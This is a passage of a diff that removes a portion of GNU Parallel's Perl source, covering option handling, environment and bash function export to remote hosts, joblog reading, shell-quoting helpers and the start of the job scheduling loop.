-    if(@opt::v) { $Global::verbose = $#opt::v+1; } # Convert -v -v to v=2
-    $Global::debug = $opt::D;
-    $Global::shell = $ENV{'PARALLEL_SHELL'} || parent_shell($$) || $ENV{'SHELL'} || "/bin/sh";
-    if(defined $opt::X) { $Global::ContextReplace = 1; }
-    if(defined $opt::silent) { $Global::verbose = 0; }
-    if(defined $opt::0) { $/ = "\0"; }
-    if(defined $opt::d) { my $e="sprintf \"$opt::d\""; $/ = eval $e; }
-    if(defined $opt::p) { $Global::interactive = $opt::p; }
-    if(defined $opt::q) { $Global::quoting = 1; }
-    if(defined $opt::r) { $Global::ignore_empty = 1; }
-    if(defined $opt::verbose) { $Global::stderr_verbose = 1; }
-    # Deal with --rpl
-    sub rpl {
-	# Modify %Global::rpl
-	# Replace $old with $new
-	my ($old,$new) =  @_;
-	if($old ne $new) {
-	    $Global::rpl{$new} = $Global::rpl{$old};
-	    delete $Global::rpl{$old};
-	}
-    }
-    if(defined $opt::parens) { $Global::parens = $opt::parens; }
-    my $parenslen = 0.5*length $Global::parens;
-    $Global::parensleft = substr($Global::parens,0,$parenslen);
-    $Global::parensright = substr($Global::parens,$parenslen);
-    if(defined $opt::plus) { %Global::rpl = (%Global::plus,%Global::rpl); }
-    if(defined $opt::I) { rpl('{}',$opt::I); }
-    if(defined $opt::U) { rpl('{.}',$opt::U); }
-    if(defined $opt::i and $opt::i) { rpl('{}',$opt::i); }
-    if(defined $opt::basenamereplace) { rpl('{/}',$opt::basenamereplace); }
-    if(defined $opt::dirnamereplace) { rpl('{//}',$opt::dirnamereplace); }
-    if(defined $opt::seqreplace) { rpl('{#}',$opt::seqreplace); }
-    if(defined $opt::slotreplace) { rpl('{%}',$opt::slotreplace); }
-    if(defined $opt::basenameextensionreplace) {
-       rpl('{/.}',$opt::basenameextensionreplace);
-    }
-    for(@opt::rpl) {
-	# Create $Global::rpl entries for --rpl options
-	# E.g: "{..} s:\.[^.]+$:;s:\.[^.]+$:;"
-	my ($shorthand,$long) = split/ /,$_,2;
-	$Global::rpl{$shorthand} = $long;
-    }
-    if(defined $opt::eof) { $Global::end_of_file_string = $opt::eof; }
-    if(defined $opt::max_args) { $Global::max_number_of_args = $opt::max_args; }
-    if(defined $opt::timeout) { $Global::timeoutq = TimeoutQueue->new($opt::timeout); }
-    if(defined $opt::tmpdir) { $ENV{'TMPDIR'} = $opt::tmpdir; }
-    if(defined $opt::help) { die_usage(); }
-    if(defined $opt::colsep) { $Global::trim = 'lr'; }
-    if(defined $opt::header) { $opt::colsep = defined $opt::colsep ? $opt::colsep : "\t"; }
-    if(defined $opt::trim) { $Global::trim = $opt::trim; }
-    if(defined $opt::arg_sep) { $Global::arg_sep = $opt::arg_sep; }
-    if(defined $opt::arg_file_sep) { $Global::arg_file_sep = $opt::arg_file_sep; }
-    if(defined $opt::number_of_cpus) { print SSHLogin::no_of_cpus(),"\n"; wait_and_exit(0); }
-    if(defined $opt::number_of_cores) {
-        print SSHLogin::no_of_cores(),"\n"; wait_and_exit(0);
-    }
-    if(defined $opt::max_line_length_allowed) {
-        print Limits::Command::real_max_length(),"\n"; wait_and_exit(0);
-    }
-    if(defined $opt::version) { version(); wait_and_exit(0); }
-    if(defined $opt::bibtex) { bibtex(); wait_and_exit(0); }
-    if(defined $opt::record_env) { record_env(); wait_and_exit(0); }
-    if(defined $opt::show_limits) { show_limits(); }
-    if(@opt::sshlogin) { @Global::sshlogin = @opt::sshlogin; }
-    if(@opt::sshloginfile) { read_sshloginfiles(@opt::sshloginfile); }
-    if(@opt::return) { push @Global::ret_files, @opt::return; }
-    if(not defined $opt::recstart and
-       not defined $opt::recend) { $opt::recend = "\n"; }
-    if(not defined $opt::blocksize) { $opt::blocksize = "1M"; }
-    $opt::blocksize = multiply_binary_prefix($opt::blocksize);
-    if(defined $opt::controlmaster) { $opt::noctrlc = 1; }
-    if(defined $opt::semaphore) { $Global::semaphore = 1; }
-    if(defined $opt::semaphoretimeout) { $Global::semaphore = 1; }
-    if(defined $opt::semaphorename) { $Global::semaphore = 1; }
-    if(defined $opt::fg) { $Global::semaphore = 1; }
-    if(defined $opt::bg) { $Global::semaphore = 1; }
-    if(defined $opt::wait) { $Global::semaphore = 1; }
-    if(defined $opt::halt_on_error and
-       $opt::halt_on_error=~/%/) { $opt::halt_on_error /= 100; }
-    if(defined $opt::timeout and $opt::timeout !~ /^\d+(\.\d+)?%?$/) {
-	::error("--timeout must be seconds or percentage\n");
-	wait_and_exit(255);
-    }
-    if(defined $opt::minversion) {
-	print $Global::version,"\n";
-	if($Global::version < $opt::minversion) {
-	    wait_and_exit(255);
-	} else {
-	    wait_and_exit(0);
-	}
-    }
-    if(not defined $opt::delay) {
-	# Set --delay to --sshdelay if not set
-	$opt::delay = $opt::sshdelay;
-    }
-    if($opt::compress_program) {
-	$opt::compress = 1;
-	$opt::decompress_program ||= $opt::compress_program." -dc";
-    }
-    if($opt::compress) {
-	my ($compress, $decompress) = find_compression_program();
-	$opt::compress_program ||= $compress;
-	$opt::decompress_program ||= $decompress;
-    }
-    if(defined $opt::nonall) {
-	# Append a dummy empty argument
-	push @ARGV, $Global::arg_sep, "";
-    }
-    if(defined $opt::tty) {
-        # Defaults for --tty: -j1 -u
-        # Can be overridden with -jXXX -g
-        if(not defined $opt::jobs) {
-            $opt::jobs = 1;
-        }
-        if(not defined $opt::group) {
-            $opt::ungroup = 0;
-        }
-    }
-    if(@opt::trc) {
-        push @Global::ret_files, @opt::trc;
-        $opt::transfer = 1;
-        $opt::cleanup = 1;
-    }
-    if(defined $opt::max_lines) {
-	if($opt::max_lines eq "-0") {
-	    # -l -0 (swallowed -0)
-	    $opt::max_lines = 1;
-	    $opt::0 = 1;
-	    $/ = "\0";
-	} elsif ($opt::max_lines == 0) {
-	    # If not given (or if 0 is given) => 1
-	    $opt::max_lines = 1;
-	}
-	$Global::max_lines = $opt::max_lines;
-	if(not $opt::pipe) {
-	    # --pipe -L means length of record - not max_number_of_args
-	    $Global::max_number_of_args ||= $Global::max_lines;
-	}
-    }
-
-    # Read more than one arg at a time (-L, -N)
-    if(defined $opt::L) {
-	$Global::max_lines = $opt::L;
-	if(not $opt::pipe) {
-	    # --pipe -L means length of record - not max_number_of_args
-	    $Global::max_number_of_args ||= $Global::max_lines;
-	}
-    }
-    if(defined $opt::max_replace_args) {
-	$Global::max_number_of_args = $opt::max_replace_args;
-	$Global::ContextReplace = 1;
-    }
-    if((defined $opt::L or defined $opt::max_replace_args)
-       and
-       not ($opt::xargs or $opt::m)) {
-	$Global::ContextReplace = 1;
-    }
-    if(defined $opt::tag and not defined $opt::tagstring) {
-	$opt::tagstring = "\257<\257>"; # Default = {}
-    }
-    if(defined $opt::pipepart and
-       (defined $opt::L or defined $opt::max_lines
-	or defined $opt::max_replace_args)) {
-	::error("--pipepart is incompatible with --max-replace-args, ",
-		"--max-lines, and -L.\n");
-	wait_and_exit(255);
-    }
-    if(grep /^$Global::arg_sep$|^$Global::arg_file_sep$/o, @ARGV) {
-        # Deal with ::: and ::::
-        @ARGV=read_args_from_command_line();
-    }
-
-    # Semaphore defaults
-    # Must be done before computing number of processes and max_line_length
-    # because when running as a semaphore GNU Parallel does not read args
-    $Global::semaphore ||= ($0 =~ m:(^|/)sem$:); # called as 'sem'
-    if($Global::semaphore) {
-        # A semaphore does not take input from neither stdin nor file
-        @opt::a = ("/dev/null");
-        push(@Global::unget_argv, [Arg->new("")]);
-        $Semaphore::timeout = $opt::semaphoretimeout || 0;
-        if(defined $opt::semaphorename) {
-            $Semaphore::name = $opt::semaphorename;
-        } else {
-            $Semaphore::name = `tty`;
-            chomp $Semaphore::name;
-        }
-        $Semaphore::fg = $opt::fg;
-        $Semaphore::wait = $opt::wait;
-        $Global::default_simultaneous_sshlogins = 1;
-        if(not defined $opt::jobs) {
-            $opt::jobs = 1;
-        }
-	if($Global::interactive and $opt::bg) {
-	    ::error("Jobs running in the ".
-		    "background cannot be interactive.\n");
-            ::wait_and_exit(255);
-	}
-    }
-    if(defined $opt::eta) {
-        $opt::progress = $opt::eta;
-    }
-    if(defined $opt::bar) {
-        $opt::progress = $opt::bar;
-    }
-    if(defined $opt::retired) {
-	    ::error("-g has been retired. Use --group.\n");
-	    ::error("-B has been retired. Use --bf.\n");
-	    ::error("-T has been retired. Use --tty.\n");
-	    ::error("-U has been retired. Use --er.\n");
-	    ::error("-W has been retired. Use --wd.\n");
-	    ::error("-Y has been retired. Use --shebang.\n");
-	    ::error("-H has been retired. Use --halt.\n");
-	    ::error("--tollef has been retired. Use -u -q --arg-sep -- and --load for -l.\n");
-            ::wait_and_exit(255);
-    }
-    citation_notice();
-
-    parse_sshlogin();
-    parse_env_var();
-
-    if(remote_hosts() and ($opt::X or $opt::m or $opt::xargs)) {
-        # As we do not know the max line length on the remote machine
-        # long commands generated by xargs may fail
-        # If opt_N is set, it is probably safe
-        ::warning("Using -X or -m with --sshlogin may fail.\n");
-    }
-
-    if(not defined $opt::jobs) {
-        $opt::jobs = "100%";
-    }
-    open_joblog();
-}
-
-sub env_quote {
-    # Input:
-    #   $v = value to quote
-    # Returns:
-    #   $v = value quoted as environment variable
-    my $v = $_[0];
-    $v =~ s/([\\])/\\$1/g;
-    $v =~ s/([\[\] \#\'\&\<\>\(\)\;\{\}\t\"\$\`\*\174\!\?\~])/\\$1/g;
-    $v =~ s/\n/"\n"/g;
-    return $v;
-}
-
-sub record_env {
-    # Record current %ENV-keys in ~/.parallel/ignored_vars
-    # Returns: N/A
-    my $ignore_filename = $ENV{'HOME'} . "/.parallel/ignored_vars";
-    if(open(my $vars_fh, ">", $ignore_filename)) {
-	print $vars_fh map { $_,"\n" } keys %ENV;
-    } else {
-	::error("Cannot write to $ignore_filename\n");
-	::wait_and_exit(255);
-    }
-}
-
-sub parse_env_var {
-    # Parse --env and set $Global::envvar, $Global::envwarn and $Global::envvarlen
-    #
-    # Bash functions must be parsed to export them remotely
-    #   Pre-shellshock style bash function:
-    #     myfunc=() {...
-    #   Post-shellshock style bash function:
-    #     BASH_FUNC_myfunc()=() {...
-    #
-    # Uses:
-    #   $Global::envvar = eval string that will set variables in both bash and csh
-    #   $Global::envwarn = If functions are used: Give warning in csh
-    #   $Global::envvarlen = length of $Global::envvar
-    #   @opt::env
-    #   $Global::shell
-    #   %ENV
-    # Returns: N/A
-    $Global::envvar = "";
-    $Global::envwarn = "";
-    my @vars = ('parallel_bash_environment');
-    for my $varstring (@opt::env) {
-        # Split up --env VAR1,VAR2
-	push @vars, split /,/, $varstring;
-    }
-    if(grep { /^_$/ } @vars) {
-	# --env _
-	# Include all vars that are not in a clean environment
-	if(open(my $vars_fh, "<", $ENV{'HOME'} . "/.parallel/ignored_vars")) {
-	    my @ignore = <$vars_fh>;
-	    chomp @ignore;
-	    my %ignore;
-	    @ignore{@ignore} = @ignore;
-	    close $vars_fh;
-	    push @vars, grep { not defined $ignore{$_} } keys %ENV;
-	    @vars = grep { not /^_$/ } @vars;
-	} else {
-	    ::error("Run '$Global::progname --record-env' in a clean environment first.\n");
-	    ::wait_and_exit(255);
-	}
-    }
-    # Duplicate vars as BASH functions to include post-shellshock functions.
-    # So --env myfunc should also look for BASH_FUNC_myfunc()
-    @vars = map { $_, "BASH_FUNC_$_()" } @vars;
-    # Keep only defined variables
-    @vars = grep { defined($ENV{$_}) } @vars;
-    # Pre-shellshock style bash function:
-    #   myfunc=() {  echo myfunc
-    #   }
-    # Post-shellshock style bash function:
-    #   BASH_FUNC_myfunc()=() {  echo myfunc
-    #   }
-    my @bash_functions = grep { substr($ENV{$_},0,4) eq "() {" } @vars;
-    my @non_functions = grep { substr($ENV{$_},0,4) ne "() {" } @vars;
-    if(@bash_functions) {
-	# Functions are not supported for all shells
-	if($Global::shell !~ m:/(bash|rbash|zsh|rzsh|dash|ksh):) {
-	    ::warning("Shell functions may not be supported in $Global::shell\n");
-	}
-    }
-
-    # Pre-shellschock names are without ()
-    my @bash_pre_shellshock = grep { not /\(\)/ } @bash_functions;
-    # Post-shellschock names are with ()
-    my @bash_post_shellshock = grep { /\(\)/ } @bash_functions;
-
-    my @qcsh = (map { my $a=$_; "setenv $a " . env_quote($ENV{$a})  }
-		grep { not /^parallel_bash_environment$/ } @non_functions);
-    my @qbash = (map { my $a=$_; "export $a=" . env_quote($ENV{$a}) }
-		 @non_functions, @bash_pre_shellshock);
-
-    push @qbash, map { my $a=$_; "eval $a\"\$$a\"" } @bash_pre_shellshock;
-    push @qbash, map { /BASH_FUNC_(.*)\(\)/; "$1 $ENV{$_}" } @bash_post_shellshock;
-
-    #ssh -tt -oLogLevel=quiet lo 'eval `echo PARALLEL_SEQ='$PARALLEL_SEQ'\;export PARALLEL_SEQ\;  PARALLEL_PID='$PARALLEL_PID'\;export PARALLEL_PID` ;'  tty\ \>/dev/null\ \&\&\ stty\ isig\ -onlcr\ -echo\;echo\ \$SHELL\ \|\ grep\ \"/t\\\{0,1\\\}csh\"\ \>\ /dev/null\ \&\&\ setenv\ BASH_FUNC_myfunc\ \\\(\\\)\\\ \\\{\\\ \\\ echo\\\ a\"'
-    #'\"\\\}\ \|\|\  myfunc\(\)\ \{\ \ echo\ a'
-    #'\}\ \;myfunc\ 1;
-
-    # Check if any variables contain \n
-    if(my @v = map { s/BASH_FUNC_(.*)\(\)/$1/; $_ } grep { $ENV{$_}=~/\n/ } @vars) {
-	# \n is bad for csh and will cause it to fail.
-	$Global::envwarn = ::shell_quote_scalar(q{echo $SHELL | egrep "/t?csh" > /dev/null && echo CSH/TCSH DO NOT SUPPORT newlines IN VARIABLES/FUNCTIONS. Unset }."@v".q{ && exec false;}."\n\n") . $Global::envwarn;
-    }
-
-    if(not @qcsh) { push @qcsh, "true"; }
-    if(not @qbash) { push @qbash, "true"; }
-    # Create lines like:
-    # echo $SHELL | grep "/t\\{0,1\\}csh" >/dev/null && setenv V1 val1 && setenv V2 val2 || export V1=val1 && export V2=val2 ; echo "$V1$V2"
-    if(@vars) {
-	$Global::envvar .=
-	    join"",
-	    (q{echo $SHELL | grep "/t\\{0,1\\}csh" > /dev/null && }
-	     . join(" && ", @qcsh)
-	     . q{ || }
-	     . join(" && ", @qbash)
-	     .q{;});
-	if($ENV{'parallel_bash_environment'}) {
-	    $Global::envvar .= 'eval "$parallel_bash_environment";'."\n";
-	}
-    }
-    $Global::envvarlen = length $Global::envvar;
-}
-
-sub open_joblog {
-    # Open joblog as specified by --joblog
-    # Uses:
-    #   $opt::resume
-    #   $opt::resume_failed
-    #   $opt::joblog
-    #   $opt::results
-    #   $Global::job_already_run
-    #   %Global::fd
-    my $append = 0;
-    if(($opt::resume or $opt::resume_failed)
-       and
-       not ($opt::joblog or $opt::results)) {
-        ::error("--resume and --resume-failed require --joblog or --results.\n");
-	::wait_and_exit(255);
-    }
-    if($opt::joblog) {
-	if($opt::resume || $opt::resume_failed) {
-	    if(open(my $joblog_fh, "<", $opt::joblog)) {
-		# Read the joblog
-		$append = <$joblog_fh>; # If there is a header: Open as append later
-		my $joblog_regexp;
-		if($opt::resume_failed) {
-		    # Make a regexp that only matches commands with exit+signal=0
-		    # 4 host 1360490623.067 3.445 1023 1222 0 0 command
-		    $joblog_regexp='^(\d+)(?:\t[^\t]+){5}\t0\t0\t';
-		} else {
-		    # Just match the job number
-		    $joblog_regexp='^(\d+)';
-		}
-		while(<$joblog_fh>) {
-		    if(/$joblog_regexp/o) {
-			# This is 30% faster than set_job_already_run($1);
-			vec($Global::job_already_run,($1||0),1) = 1;
-		    } elsif(not /\d+\s+[^\s]+\s+([0-9.]+\s+){6}/) {
-			::error("Format of '$opt::joblog' is wrong: $_");
-			::wait_and_exit(255);
-		    }
-		}
-		close $joblog_fh;
-	    }
-	}
-	if($append) {
-	    # Append to joblog
-	    if(not open($Global::joblog, ">>", $opt::joblog)) {
-		::error("Cannot append to --joblog $opt::joblog.\n");
-		::wait_and_exit(255);
-	    }
-	} else {
-	    if($opt::joblog eq "-") {
-		# Use STDOUT as joblog
-		$Global::joblog = $Global::fd{1};
-	    } elsif(not open($Global::joblog, ">", $opt::joblog)) {
-		# Overwrite the joblog
-		::error("Cannot write to --joblog $opt::joblog.\n");
-		::wait_and_exit(255);
-	    }
-	    print $Global::joblog
-		join("\t", "Seq", "Host", "Starttime", "JobRuntime",
-		     "Send", "Receive", "Exitval", "Signal", "Command"
-		). "\n";
-	}
-    }
-}
-
-sub find_compression_program {
-    # Find a fast compression program
-    # Returns:
-    #   $compress_program = compress program with options
-    #   $decompress_program = decompress program with options
-
-    # Search for these. Sorted by speed
-    my @prg = qw(lzop pigz pxz gzip plzip pbzip2 lzma xz lzip bzip2);
-    for my $p (@prg) {
-	if(which($p)) {
-	    return ("$p -c -1","$p -dc");
-	}
-    }
-    # Fall back to cat
-    return ("cat","cat");
-}
-
-
-sub read_options {
-    # Read options from command line, profile and $PARALLEL
-    # Uses:
-    #   $opt::shebang_wrap
-    #   $opt::shebang
-    #   @ARGV
-    #   $opt::plain
-    #   @opt::profile
-    #   $ENV{'HOME'}
-    #   $ENV{'PARALLEL'}
-    # Returns:
-    #   @ARGV_no_opt = @ARGV without --options
-
-    # This must be done first as this may exec myself
-    if(defined $ARGV[0] and ($ARGV[0] =~ /^--shebang/ or
-			     $ARGV[0] =~ /^--shebang-?wrap/ or
-			     $ARGV[0] =~ /^--hashbang/)) {
-        # Program is called from #! line in script
-	# remove --shebang-wrap if it is set
-        $opt::shebang_wrap = ($ARGV[0] =~ s/^--shebang-?wrap *//);
-	# remove --shebang if it is set
-	$opt::shebang = ($ARGV[0] =~ s/^--shebang *//);
-	# remove --hashbang if it is set
-        $opt::shebang .= ($ARGV[0] =~ s/^--hashbang *//);
-	if($opt::shebang) {
-	    my $argfile = shell_quote_scalar(pop @ARGV);
-	    # exec myself to split $ARGV[0] into separate fields
-	    exec "$0 --skip-first-line -a $argfile @ARGV";
-	}
-	if($opt::shebang_wrap) {
-            my @options;
-	    my @parser;
-	    if ($^O eq 'freebsd') {
-		# FreeBSD's #! puts different values in @ARGV than Linux' does.
-		my @nooptions = @ARGV;
-		get_options_from_array(\@nooptions);
-		while($#ARGV > $#nooptions) {
-		    push @options, shift @ARGV;
-		}
-		while(@ARGV and $ARGV[0] ne ":::") {
-		    push @parser, shift @ARGV;
-		}
-		if(@ARGV and $ARGV[0] eq ":::") {
-		    shift @ARGV;
-		}
-	    } else {
-		@options = shift @ARGV;
-	    }
-	    my $script = shell_quote_scalar(shift @ARGV);
-	    # exec myself to split $ARGV[0] into separate fields
-	    exec "$0 --internal-pipe-means-argfiles @options @parser $script ::: @ARGV";
-	}
-    }
-
-    Getopt::Long::Configure("bundling","require_order");
-    my @ARGV_copy = @ARGV;
-    # Check if there is a --profile to set @opt::profile
-    get_options_from_array(\@ARGV_copy,"profile|J=s","plain") || die_usage();
-    my @ARGV_profile = ();
-    my @ARGV_env = ();
-    if(not $opt::plain) {
-	# Add options from .parallel/config and other profiles
-	my @config_profiles = (
-	    "/etc/parallel/config",
-	    $ENV{'HOME'}."/.parallel/config",
-	    $ENV{'HOME'}."/.parallelrc");
-	my @profiles = @config_profiles;
-	if(@opt::profile) {
-	    # --profile overrides default profiles
-	    @profiles = ();
-	    for my $profile (@opt::profile) {
-		if(-r $profile) {
-		    push @profiles, $profile;
-		} else {
-		    push @profiles, $ENV{'HOME'}."/.parallel/".$profile;
-		}
-	    }
-	}
-	for my $profile (@profiles) {
-	    if(-r $profile) {
-		open (my $in_fh, "<", $profile) || ::die_bug("read-profile: $profile");
-		while(<$in_fh>) {
-		    /^\s*\#/ and next;
-		    chomp;
-		    push @ARGV_profile, shellwords($_);
-		}
-		close $in_fh;
-	    } else {
-		if(grep /^$profile$/, @config_profiles) {
-		    # config file is not required to exist
-		} else {
-		    ::error("$profile not readable.\n");
-		    wait_and_exit(255);
-		}
-	    }
-	}
-	# Add options from shell variable $PARALLEL
-	if($ENV{'PARALLEL'}) {
-	    @ARGV_env = shellwords($ENV{'PARALLEL'});
-	}
-    }
-    Getopt::Long::Configure("bundling","require_order");
-    get_options_from_array(\@ARGV_profile) || die_usage();
-    get_options_from_array(\@ARGV_env) || die_usage();
-    get_options_from_array(\@ARGV) || die_usage();
-
-    # Prepend non-options to @ARGV (such as commands like 'nice')
-    unshift @ARGV, @ARGV_profile, @ARGV_env;
-    return @ARGV;
-}
-
-sub read_args_from_command_line {
-    # Arguments given on the command line after:
-    #   ::: ($Global::arg_sep)
-    #   :::: ($Global::arg_file_sep)
-    # Removes the arguments from @ARGV and:
-    # - puts filenames into -a
-    # - puts arguments into files and add the files to -a
-    # Input:
-    #   @::ARGV = command option ::: arg arg arg :::: argfiles
-    # Uses:
-    #   $Global::arg_sep
-    #   $Global::arg_file_sep
-    #   $opt::internal_pipe_means_argfiles
-    #   $opt::pipe
-    #   @opt::a
-    # Returns:
-    #   @argv_no_argsep = @::ARGV without ::: and :::: and following args
-    my @new_argv = ();
-    for(my $arg = shift @ARGV; @ARGV; $arg = shift @ARGV) {
-        if($arg eq $Global::arg_sep
-	   or
-	   $arg eq $Global::arg_file_sep) {
-	    my $group = $arg; # This group of arguments is args or argfiles
-	    my @group;
-	    while(defined ($arg = shift @ARGV)) {
-		if($arg eq $Global::arg_sep
-		   or
-		   $arg eq $Global::arg_file_sep) {
-		    # exit while loop if finding new separator
-		    last;
-		} else {
-		    # If not hitting ::: or ::::
-		    # Append it to the group
-		    push @group, $arg;
-		}
-	    }
-
-	    if($group eq $Global::arg_file_sep
-	       or ($opt::internal_pipe_means_argfiles and $opt::pipe)
-		) {
-		# Group of file names on the command line.
-		# Append args into -a
-		push @opt::a, @group;
-	    } elsif($group eq $Global::arg_sep) {
-		# Group of arguments on the command line.
-		# Put them into a file.
-		# Create argfile
-		my ($outfh,$name) = ::tmpfile(SUFFIX => ".arg");
-		unlink($name);
-		# Put args into argfile
-		print $outfh map { $_,$/ } @group;
-		seek $outfh, 0, 0;
-		# Append filehandle to -a
-		push @opt::a, $outfh;
-	    } else {
-		::die_bug("Unknown command line group: $group");
-	    }
-	    if(defined($arg)) {
-		# $arg is ::: or ::::
-		redo;
-	    } else {
-		# $arg is undef -> @ARGV empty
-		last;
-	    }
-	}
-	push @new_argv, $arg;
-    }
-    # Output: @ARGV = command to run with options
-    return @new_argv;
-}
-
-sub cleanup {
-    # Returns: N/A
-    if(@opt::basefile) { cleanup_basefile(); }
-}
-
-sub __QUOTING_ARGUMENTS_FOR_SHELL__ {}
-
-sub shell_quote {
-    # Input:
-    #   @strings = strings to be quoted
-    # Output:
-    #   @shell_quoted_strings = string quoted with \ as needed by the shell
-    my @strings = (@_);
-    for my $a (@strings) {
-        $a =~ s/([\002-\011\013-\032\\\#\?\`\(\)\{\}\[\]\*\>\<\~\|\; \"\!\$\&\'\202-\377])/\\$1/g;
-        $a =~ s/[\n]/'\n'/g; # filenames with '\n' is quoted using \'
-    }
-    return wantarray ? @strings : "@strings";
-}
-
-sub shell_quote_empty {
-    # Inputs:
-    #   @strings = strings to be quoted
-    # Returns:
-    #   @quoted_strings = empty strings quoted as ''.
-    my @strings = shell_quote(@_);
-    for my $a (@strings) {
-	if($a eq "") {
-	    $a = "''";
-	}
-    }
-    return wantarray ? @strings : "@strings";
-}
-
-sub shell_quote_scalar {
-    # Quote the string so shell will not expand any special chars
-    # Inputs:
-    #   $string = string to be quoted
-    # Returns:
-    #   $shell_quoted = string quoted with \ as needed by the shell
-    my $a = $_[0];
-    if(defined $a) {
-	# $a =~ s/([\002-\011\013-\032\\\#\?\`\(\)\{\}\[\]\*\>\<\~\|\; \"\!\$\&\'\202-\377])/\\$1/g;
-	# This is 1% faster than the above
-	$a =~ s/[\002-\011\013-\032\\\#\?\`\(\)\{\}\[\]\*\>\<\~\|\; \"\!\$\&\'\202-\377]/\\$&/go;
-	$a =~ s/[\n]/'\n'/go; # filenames with '\n' is quoted using \'
-    }
-    return $a;
-}
-
-sub shell_quote_file {
-    # Quote the string so shell will not expand any special chars and prepend ./ if needed
-    # Input:
-    #   $filename = filename to be shell quoted
-    # Returns:
-    #   $quoted_filename = filename quoted with \ as needed by the shell and ./ if needed
-    my $a = shell_quote_scalar(shift);
-    if(defined $a) {
-	if($a =~ m:^/: or $a =~ m:^\./:) {
-	    # /abs/path or ./rel/path => skip
-	} else {
-	    # rel/path => ./rel/path
-	    $a = "./".$a;
-	}
-    }
-    return $a;
-}
-
-sub shellwords {
-    # Input:
-    #   $string = shell line
-    # Returns:
-    #   @shell_words = $string split into words as shell would do
-    $Global::use{"Text::ParseWords"} ||= eval "use Text::ParseWords; 1;";
-    return Text::ParseWords::shellwords(@_);
-}
-
-
-sub __FILEHANDLES__ {}
-
-
-sub save_stdin_stdout_stderr {
-    # Remember the original STDIN, STDOUT and STDERR
-    # and file descriptors opened by the shell (e.g. 3>/tmp/foo)
-    # Uses:
-    #   %Global::fd
-    #   $Global::original_stderr
-    #   $Global::original_stdin
-    # Returns: N/A
-
-    # Find file descriptors that are already opened (by the shell)
-    for my $fdno (1..61) {
-	# /dev/fd/62 and above are used by bash for <(cmd)
-	my $fh;
-	# 2-argument-open is used to be compatible with old perl 5.8.0
-	# bug #43570: Perl 5.8.0 creates 61 files
-	if(open($fh,">&=$fdno")) {
-	    $Global::fd{$fdno}=$fh;
-	}
-    }
-    open $Global::original_stderr, ">&", "STDERR" or
-	::die_bug("Can't dup STDERR: $!");
-    open $Global::original_stdin, "<&", "STDIN" or
-	::die_bug("Can't dup STDIN: $!");
-}
-
-sub enough_file_handles {
-    # Check that we have enough filehandles available for starting
-    # another job
-    # Uses:
-    #   $opt::ungroup
-    #   %Global::fd
-    # Returns:
-    #   1 if ungrouped (thus not needing extra filehandles)
-    #   0 if too few filehandles
-    #   1 if enough filehandles
-    if(not $opt::ungroup) {
-        my %fh;
-        my $enough_filehandles = 1;
-  	# perl uses 7 filehandles for something?
-        # open3 uses 2 extra filehandles temporarily
-        # We need a filehandle for each redirected file descriptor
-	# (normally just STDOUT and STDERR)
-	for my $i (1..(7+2+keys %Global::fd)) {
-            $enough_filehandles &&= open($fh{$i}, "<", "/dev/null");
-        }
-        for (values %fh) { close $_; }
-        return $enough_filehandles;
-    } else {
-	# Ungrouped does not need extra file handles
-	return 1;
-    }
-}
-
-sub open_or_exit {
-    # Open a file name or exit if the file cannot be opened
-    # Inputs:
-    #   $file = filehandle or filename to open
-    # Uses:
-    #   $Global::stdin_in_opt_a
-    #   $Global::original_stdin
-    # Returns:
-    #   $fh = file handle to read-opened file
-    my $file = shift;
-    if($file eq "-") {
-	$Global::stdin_in_opt_a = 1;
-	return ($Global::original_stdin || *STDIN);
-    }
-    if(ref $file eq "GLOB") {
-	# This is an open filehandle
-	return $file;
-    }
-    my $fh = gensym;
-    if(not open($fh, "<", $file)) {
-        ::error("Cannot open input file `$file': No such file or directory.\n");
-        wait_and_exit(255);
-    }
-    return $fh;
-}
-
-sub __RUNNING_THE_JOBS_AND_PRINTING_PROGRESS__ {}
-
-# Variable structure:
-#
-#    $Global::running{$pid} = Pointer to Job-object
-#    @Global::virgin_jobs = Pointer to Job-object that have received no input
-#    $Global::host{$sshlogin} = Pointer to SSHLogin-object
-#    $Global::total_running = total number of running jobs
-#    $Global::total_started = total jobs started
-
-sub init_run_jobs {
-    $Global::total_running = 0;
-    $Global::total_started = 0;
-    $Global::tty_taken = 0;
-    $SIG{USR1} = \&list_running_jobs;
-    $SIG{USR2} = \&toggle_progress;
-    if(@opt::basefile) { setup_basefile(); }
-}
-
-{
-    my $last_time;
-    my %last_mtime;
-
-sub start_more_jobs {
-    # Run start_another_job() but only if:
-    #   * not $Global::start_no_new_jobs set
-    #   * not JobQueue is empty
-    #   * not load on server is too high
-    #   * not server swapping
-    #   * not too short time since last remote login
-    # Uses:
-    #   $Global::max_procs_file
-    #   $Global::max_procs_file_last_mod
-    #   %Global::host
-    #   @opt::sshloginfile
-    #   $Global::start_no_new_jobs
-    #   $opt::filter_hosts
-    #   $Global::JobQueue
-    #   $opt::pipe
-    #   $opt::load
-    #   $opt::noswap
-    #   $opt::delay
-    #   $Global::newest_starttime
-    # Returns:
-    #   $jobs_started = number of jobs started
-    my $jobs_started = 0;
-    my $jobs_started_this_round = 0;
-    if($Global::start_no_new_jobs) {
-	return $jobs_started;
-    }
-    if(time - ($last_time||0) > 1) {
-	# At most do this every second
-	$last_time = time;
-	if($Global::max_procs_file) {
-	    # --jobs filename
-	    my $mtime = (stat($Global::max_procs_file))[9];
-	    if($mtime > $Global::max_procs_file_last_mod) {
-		# file changed: Force re-computing max_jobs_running
-		$Global::max_procs_file_last_mod = $mtime;
-		for my $sshlogin (values %Global::host) {
-		    $sshlogin->set_max_jobs_running(undef);
-		}
-	    }
-	}
-	if(@opt::sshloginfile) {
-	    # Is --sshloginfile changed?
-	    for my $slf (@opt::sshloginfile) {
-		my $actual_file = expand_slf_shorthand($slf);
-		my $mtime = (stat($actual_file))[9];
-		$last_mtime{$actual_file} ||= $mtime;
-		if($mtime - $last_mtime{$actual_file} > 1) {
-		    ::debug("run","--sshloginfile $actual_file changed. reload\n");
-		    $last_mtime{$actual_file} = $mtime;
-		    # Reload $slf
-		    # Empty sshlogins
-		    @Global::sshlogin = ();
-		    for (values %Global::host) {
-			# Don't start new jobs on any host
-			# except the ones added back later
-			$_->set_max_jobs_running(0);
-		    }
-		    # This will set max_jobs_running on the SSHlogins
-		    read_sshloginfile($actual_file);
-		    parse_sshlogin();
-		    $opt::filter_hosts and filter_hosts();
-		    setup_basefile();
-		}
-	    }
-	}
-    }
-    do {
-	$jobs_started_this_round = 0;
-	# This will start 1 job on each --sshlogin (if possible)
-	# thus distribute the jobs on the --sshlogins round robin
-
-	for my $sshlogin (values %Global::host) {
